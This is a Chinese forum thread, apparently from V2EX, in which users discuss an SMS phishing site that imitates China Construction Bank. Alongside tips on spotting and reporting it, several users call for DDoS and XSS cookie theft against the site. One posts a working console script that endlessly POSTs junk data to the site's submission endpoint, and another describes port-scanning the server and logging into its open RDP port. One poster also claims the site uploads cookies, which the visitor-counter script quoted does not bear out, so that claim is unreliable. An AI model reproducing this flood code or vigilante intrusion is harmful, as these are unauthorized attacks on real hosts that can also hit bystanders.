刚刚收到一个骗子网站信息 高仿的建设银行 如何破解？

现在都不敢点骗子的网站了， 怕偷 cookies

@ScotGu 隐身窗口

@ScotGu 原来如此，我用电脑打开的。。

@javaluo 除了这招 还有其他方法限制读取第三方（域名） cookies 么？

挂代理持续不断慢慢的提交卡号和密码过去。

话说为毛片子那么爱建行……我也收到过好几次

来吧，往这个地方 post 点数据给它 submit.asp?idType=1&g_zhanghao=SB&g_wangyin=SB&g_xingming=SB&g_shenfenzheng=SB&g_shouji=SB&g_cvn=SB&g_yxq=SB&iaa=1

看这个域名就知道假了。

香港的服务器 随便 DDCC 下就死了

@typcn

@shakoon 伪造数据 POST 过去更好，他们要验证，哈哈哈

v2 上好像有唯技术的倾向啊，其实只要举报一下就行了

http://www.12321.cn/jb_web.php

其实楼主你发上来很快就有一堆无聊的人搞蹦它

@CYKun
然而并没有什么卵用
知乎上有人把钓鱼 app 反编译找到接受数据的邮箱和手机号，然后举报给警察
警察表示证据不足,不予处理.......

@lhbc 难道还人肉验证？

召唤大神 @typcn

360 报毒

我也收到类似的,不过是工行的,我点击这个网站的电脑版 自动转跳到了 建设银行

顺路发一个短信里的高仿支付宝
http://m.alipayj.pw/

毒霸拦截了，告诉我了建行真实的网址。。。

已经崩塌完毕! 不用谢!

@leakeung 真快。。。。我还想玩玩的....

说起来真是奇怪，有些网站会因为没有备案而被 block

这种诈骗网站却没有警察来管

@xuyinan503 我的理解是备案管的是境内网站,GFW 才管境外的 GFW 其实可以有屏蔽诈骗网站的功能哈

看域名都没觉得是高仿。

使劲 Post 数据， asp+Access 的，很容易把数据库撑爆

XSS ，打后台地址和 Cookies ，不过得看后端过滤严不严

现已加入 每日一打 计划。

不谢

@wavingclear 请用手机浏览器访问，笑死我了。

@ScotGu 一般都做了防跨域的

腾讯管家已检测到是恶意链接

控制台输入

var data = {idType:1,
g_zhanghao:44444444444444444444444,
g_wangyin:444444,
g_xingming:4444,
g_shenfenzheng:44444444444444444444444444444444444,
g_shouji:4444,
g_cvn:444,
g_yxq:4444,
iaa:1}
function postSubmit() {
$.post("http://wap.ccibea.cc/submit.asp", data, function() {
setTimeout(function() {
postSubmit()
},1)
})
}
postSubmit()

已崩？

@xbb7766 可能一是建行用的人多，二是建行的网页支付很方便

我收到了 2 条类似的。 看这里 http://www.txwz.qq.com/map/pseudo-base-station.html 阴谋论的说，很怀疑建行泄露用户数据了

输入雷军进去，一直在循环，哈哈哈

写了个 for 循环提交数据试试去

骗子在万网注册的域名，打电话给万网，不给处理，平了一下 IP 地址为： 113.10.138.104 ，是香港的服务器 http://whois.chinaz.com/ccibea.cc 这个是查到骗子的信息：联系人： zhang qiang
联系方式： [email protected] ，ＱＱ加不上，端口扫描了一下， 3389 端口还开着，连上去，用的 Windows2003 ， http://i13.tietuku.com/394253e4e863ebabs.png ，大家说要不要继续啊

端口开着 21,80 ， 3389 http://i12.tietuku.com/550cd02f2d4b0b96s.png

建议搭建不要用常用浏览器去打开它，它还上传浏览器.cookieS ，可恶！！！！！！！！！！！！！！
function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<a href="http://countt.51yes.com/index.aspx?id=196342855" target=_blank><img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count19.51yes.com/count1.gif" alt="51YES 网站统计系统"></a>');document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count19.51yes.com/sa.htm?id=196342855'+yesdata+' height=0 width=0></iframe>');

//i.v2ex.co/22y3IHko.jpeg

这哥们还挺聪明的，专门注册 了一个 QQ 用来注册万网